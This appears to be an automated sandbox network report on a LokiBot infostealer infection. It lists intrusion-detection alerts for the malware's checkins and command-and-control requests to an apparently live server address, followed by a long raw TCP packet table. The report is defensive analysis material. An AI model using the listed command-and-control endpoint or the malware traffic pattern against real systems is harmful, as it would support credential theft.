                                                        2024-10-03T09:22:36.015476+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444045.149.241.16980TCP
                                                        2024-10-03T09:22:36.015476+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444045.149.241.16980TCP
                                                        2024-10-03T09:22:36.015476+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444045.149.241.16980TCP
                                                        2024-10-03T09:22:36.750157+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444045.149.241.16980TCP
                                                        2024-10-03T09:22:36.750157+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444045.149.241.16980TCP
                                                        2024-10-03T09:22:36.755143+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164440TCP
                                                        2024-10-03T09:22:36.917140+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444145.149.241.16980TCP
                                                        2024-10-03T09:22:36.917140+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444145.149.241.16980TCP
                                                        2024-10-03T09:22:36.917140+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444145.149.241.16980TCP
                                                        2024-10-03T09:22:37.777548+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444145.149.241.16980TCP
                                                        2024-10-03T09:22:37.777548+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444145.149.241.16980TCP
                                                        2024-10-03T09:22:37.782566+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164441TCP
                                                        2024-10-03T09:22:37.931400+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444245.149.241.16980TCP
                                                        2024-10-03T09:22:37.931400+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444245.149.241.16980TCP
                                                        2024-10-03T09:22:37.931400+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444245.149.241.16980TCP
                                                        2024-10-03T09:22:38.687921+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444245.149.241.16980TCP
                                                        2024-10-03T09:22:38.687921+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444245.149.241.16980TCP
                                                        2024-10-03T09:22:38.692949+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164442TCP
                                                        2024-10-03T09:22:38.836712+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444345.149.241.16980TCP
                                                        2024-10-03T09:22:38.836712+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444345.149.241.16980TCP
                                                        2024-10-03T09:22:38.836712+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444345.149.241.16980TCP
                                                        2024-10-03T09:22:39.523859+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444345.149.241.16980TCP
                                                        2024-10-03T09:22:39.523859+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444345.149.241.16980TCP
                                                        2024-10-03T09:22:39.530058+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164443TCP
                                                        2024-10-03T09:22:39.681925+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444445.149.241.16980TCP
                                                        2024-10-03T09:22:39.681925+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444445.149.241.16980TCP
                                                        2024-10-03T09:22:39.681925+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444445.149.241.16980TCP
                                                        2024-10-03T09:22:40.350489+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444445.149.241.16980TCP
                                                        2024-10-03T09:22:40.350489+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444445.149.241.16980TCP
                                                        2024-10-03T09:22:40.355345+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164444TCP
                                                        2024-10-03T09:22:40.614660+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444545.149.241.16980TCP
                                                        2024-10-03T09:22:40.614660+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444545.149.241.16980TCP
                                                        2024-10-03T09:22:40.614660+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444545.149.241.16980TCP
                                                        2024-10-03T09:22:41.352352+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444545.149.241.16980TCP
                                                        2024-10-03T09:22:41.352352+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444545.149.241.16980TCP
                                                        2024-10-03T09:22:41.357295+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164445TCP
                                                        2024-10-03T09:22:41.558183+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444645.149.241.16980TCP
                                                        2024-10-03T09:22:41.558183+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444645.149.241.16980TCP
                                                        2024-10-03T09:22:41.558183+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444645.149.241.16980TCP
                                                        2024-10-03T09:22:42.187830+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444645.149.241.16980TCP
                                                        2024-10-03T09:22:42.187830+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444645.149.241.16980TCP
                                                        2024-10-03T09:22:42.192690+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164446TCP
                                                        2024-10-03T09:22:42.344416+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444745.149.241.16980TCP
                                                        2024-10-03T09:22:42.344416+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444745.149.241.16980TCP
                                                        2024-10-03T09:22:42.344416+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444745.149.241.16980TCP
                                                        2024-10-03T09:22:43.088359+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444745.149.241.16980TCP
                                                        2024-10-03T09:22:43.088359+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444745.149.241.16980TCP
                                                        2024-10-03T09:22:43.095306+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164447TCP
                                                        2024-10-03T09:22:43.251789+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444845.149.241.16980TCP
                                                        2024-10-03T09:22:43.251789+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444845.149.241.16980TCP
                                                        2024-10-03T09:22:43.251789+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444845.149.241.16980TCP
                                                        2024-10-03T09:22:43.911035+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444845.149.241.16980TCP
                                                        2024-10-03T09:22:43.911035+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444845.149.241.16980TCP
                                                        2024-10-03T09:22:43.915998+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164448TCP
                                                        2024-10-03T09:22:44.067474+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116444945.149.241.16980TCP
                                                        2024-10-03T09:22:44.067474+02002025381ET MALWARE LokiBot Checkin1192.168.2.116444945.149.241.16980TCP
                                                        2024-10-03T09:22:44.067474+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116444945.149.241.16980TCP
                                                        2024-10-03T09:22:44.840138+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116444945.149.241.16980TCP
                                                        2024-10-03T09:22:44.840138+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116444945.149.241.16980TCP
                                                        2024-10-03T09:22:44.845008+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164449TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 3, 2024 09:20:40.672699928 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:40.672744036 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:40.672816992 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:40.683554888 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:40.683572054 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:41.147365093 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:41.147464037 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:41.151506901 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:41.151516914 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:41.151813984 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:41.162029028 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:41.207395077 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:41.801786900 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:41.852828026 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.034029961 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.034097910 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.034127951 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.034145117 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.034152985 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.034190893 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.034198046 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.087167978 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.126534939 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.126604080 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.126633883 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.126686096 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.126694918 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.126748085 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.234178066 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.234283924 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.234323978 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.234361887 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.234448910 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.234466076 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.234577894 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.234586000 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.234674931 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.359283924 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.359345913 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.359415054 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.359427929 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.415311098 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.447220087 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.447319031 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.447375059 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.447380066 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.447395086 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.447432995 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.538100004 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.538161993 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.538186073 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.538207054 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.538211107 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.538230896 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.538256884 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.587136984 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.587148905 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.613109112 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.613172054 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.613188028 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.615318060 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.615371943 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.615379095 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.665298939 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.713967085 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.714024067 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.714087009 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.714092970 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.714123011 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.714163065 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.714211941 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.759073973 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.759114981 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.805934906 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.846018076 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.849173069 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.849183083 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.849204063 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.849261045 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.849281073 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.849328995 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.897768021 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.897777081 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.897895098 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:43.897911072 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:43.897964954 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.023113012 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.023123980 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.023159981 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.023279905 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.023312092 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.023374081 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.118278027 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.118288040 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.118320942 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.118398905 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.118427038 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.118442059 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.118480921 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.119322062 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.119381905 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.228482962 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.228574038 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.230460882 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.230504036 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.230540991 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.230551958 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.230607986 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.317517042 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.317709923 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.317814112 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.317883015 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.317890882 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.368488073 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.410017967 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.410032034 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.410145044 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.536700964 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.536720991 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.536851883 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.536864996 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.536915064 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.558695078 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.558783054 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.616894007 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.616945982 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.616993904 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.617008924 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.617036104 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.626147032 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.626192093 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.626241922 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.626250982 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.626281977 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.680938005 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.711273909 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.711288929 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.711401939 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.711421013 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.711432934 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.711481094 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.711497068 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.711549044 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.827578068 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.827692986 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.913237095 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.913834095 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.913849115 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.914011002 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.923367023 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.923441887 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.923604965 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.923743010 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:44.924036980 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:44.924210072 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.035152912 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.035235882 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.035332918 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.035351038 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.035406113 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.035491943 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.038309097 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.038459063 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.113161087 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.113207102 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.113363981 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.113434076 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.113455057 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.113538027 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.113823891 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.113893032 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.113900900 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.114099026 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.253374100 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.253437042 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.253513098 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.253534079 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.253573895 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.306171894 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.313536882 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.313549042 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.313584089 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.313626051 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.313637972 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.313654900 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.368489027 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.420361996 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.420377016 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.420416117 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.420445919 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.420449972 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.420468092 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.420489073 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.420496941 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.462271929 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.549480915 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.549494028 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.549535990 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.549581051 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.549598932 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.549619913 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.586774111 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.586875916 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.586884975 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.586980104 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.589699984 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.589710951 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.589742899 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.589787960 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.589796066 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.589840889 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.634145021 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.663816929 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.663826942 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.663881063 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.663912058 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.664010048 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.664030075 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.664104939 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.712156057 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.774667025 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.774760962 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.780067921 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.780082941 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.780128002 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.780194998 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.780194998 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.780206919 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.780278921 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.861723900 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.861736059 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.861790895 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.861824036 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.861912966 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.861927032 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.861947060 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.904886007 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.904938936 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.905016899 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.905029058 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.905076027 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.905168056 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.907459974 CEST44349710188.114.96.3192.168.2.11
